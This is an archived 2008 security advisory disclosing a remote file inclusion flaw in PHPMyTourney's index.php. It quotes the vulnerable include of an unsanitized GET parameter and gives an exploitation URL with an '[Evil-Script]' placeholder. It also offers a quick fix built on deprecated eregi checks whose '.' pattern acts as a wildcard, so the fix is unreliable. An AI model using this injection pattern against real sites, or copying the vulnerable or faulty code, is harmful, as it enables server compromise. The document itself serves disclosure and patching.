phpmyt-rfi.txt

phpmyt-rfi.txt: Posted Mar 3, 2008; Authored by HACKERS PAL | Site soqor.net; PHPMyTourney suffers from a remote file inclusion vulnerability in index.php.; tags | exploit, remote, php, code execution, file inclusion; SHA-256 | 8e4fae918262720a679ee27f816b327973c489f177e741676ddfc4d5c5c2abd3; Download | Favorite | View

phpmyt-rfi.txt

Hello

PHPMyTourney Remote file include Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

home page : http://phpmytourney.sourceforge.net

Script : PHPMyTourney


vulnerable file : phpmytourney/sources/tourney/index.php

code
         $page = $_GET['page'];
         if(isset($page))
            include($page . '.php');
         else
            echo("must specify a page ");
lines 45-49

fast solution
replace with

if(file_exists($page . '.php') and !eregi(".",$page) and !eregi(":",$page) and !eregi("/",$page))
{
            include($page . '.php');
}
else
{
            echo("must specify a page ");
}

phpmytourney/sources/tourney/index.php?page=[Evil-Script]



#WwW.SoQoR.NeT

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

phpmyt-rfi.txt

phpmyt-rfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpmyt-rfi.txt

Share This

phpmyt-rfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems